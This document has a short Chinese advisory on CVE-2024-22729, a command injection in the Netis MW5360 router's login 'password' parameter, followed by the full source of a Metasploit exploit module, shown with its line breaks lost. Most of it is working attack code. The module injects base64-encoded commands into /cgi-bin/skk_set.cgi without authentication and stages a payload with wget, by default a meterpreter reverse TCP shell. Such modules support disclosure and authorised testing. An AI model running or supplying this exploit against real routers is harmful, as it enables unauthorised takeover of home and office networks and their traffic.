Netis MW5360 路由器在登录页面上的“password”参数中存在命令注入漏洞。该漏洞源于路由器 Web 界面对“password”参数的处理不当。攻击者可以通过在 base64 编码的“password”参数中注入命令来利用此命令注入漏洞。成功利用此漏洞会导致未经授权的命令执行，从而可能使攻击者控制路由器。

🤔 该漏洞存在于 Netis MW5360 路由器的登录页面，攻击者可以通过在“password”参数中注入 base64 编码的命令来利用该漏洞。

🚀 漏洞利用过程包括向路由器的登录页面发送一个 POST 请求，请求中包含一个经过 base64 编码的恶意命令，该命令将被路由器执行。

🛡️ 该漏洞影响所有运行 V1.0.1.3442 或更低版本的 Netis MW5360 路由器固件。

⚠️ 成功利用该漏洞可能导致攻击者获得对路由器的完全控制权，包括访问敏感数据、修改配置、甚至控制网络流量。

🆘 用户应尽快更新路由器固件到最新版本以修复该漏洞，并采取其他安全措施，例如更改默认密码、启用双因素身份验证等。

This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::RemoteRank = ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::CmdStagerinclude Msf::Exploit::FileDropperprepend Msf::Exploit::Remote::AutoCheckdef initialize(info = {})super(update_info(info,'Name' => 'Netis router MW5360 unauthenticated RCE.','Description' => %q{Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.The vulnerability stems from improper handling of the "password" parameter within the router's web interface.The router's login page authorization can be bypassed by simply deleting the authorization header,leading to the vulnerability. All router firmware versions up to V1.0.1.3442 are vulnerable.Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injectionvulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attackerto take control of the router.},'License' => MSF_LICENSE,'Author' => ['h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor'Adhikara13' # Discovery of the vulnerability],'References' => [['CVE', '2024-22729'],['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']],'DisclosureDate' => '2024-01-11','Platform' => ['linux'],'Arch' => [ARCH_MIPSLE],'Privileged' => true,'Targets' => [['Linux Dropper',{'Platform' => ['linux'],'Arch' => [ARCH_MIPSLE],'Type' => :linux_dropper,'CmdStagerFlavor' => ['wget'],'DefaultOptions' => {'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'}}]],'DefaultTarget' => 0,'DefaultOptions' => {'SSL' => false,'RPORT' => 80},'Notes' => {'Stability' => [CRASH_SAFE],'Reliability' => [REPEATABLE_SESSION],'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]}))register_options([OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])])enddef execute_command(cmd, _opts = {})# cleanup payload file when session is established.if cmd.include?('chmod +x')register_files_for_cleanup(cmd.split('+x')[1].strip)end# skip last command to remove payload because it does not workunless cmd.include?('rm -f')payload = Base64.strict_encode64("#{cmd}")print_status("Executing #{cmd}")send_request_cgi({'method' => 'POST','uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),'vars_post' => {'password' => payload,'quick_set' => 'ap','app' => 'wan_set_shortcut'}})endenddef checkprint_status("Checking if #{peer} can be exploited.")res = send_request_cgi({'method' => 'POST','uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),'vars_post' => {'mode_name' => 'skk_get','wl_link' => 0}})return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')# trying to get the model and version number# unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(version = res.body.match(/.?(version).?\s:\s.?((\|[^,])*)/)# when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparisonunless version.nil?version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop# The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3Dif version[2].upcase.split('-V')[0].include?('-')model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')elsemodel_number = version[2].upcase.split('-V')[0][/(([^)]+)/, 1].gsub(/[[:space:]]/, '')end# Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lowerif version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))return CheckCode::Appears(version[2].chop.to_s)endreturn CheckCode::Safe(version[2].chop.to_s)endCheckCode::Safeenddef exploitprint_status("Executing #{target.name} for #{datastore['PAYLOAD']}")case target['Type']when :linux_dropper# Don't check the response here since the server won't respond# if the payload is successfully executedexecute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])endendend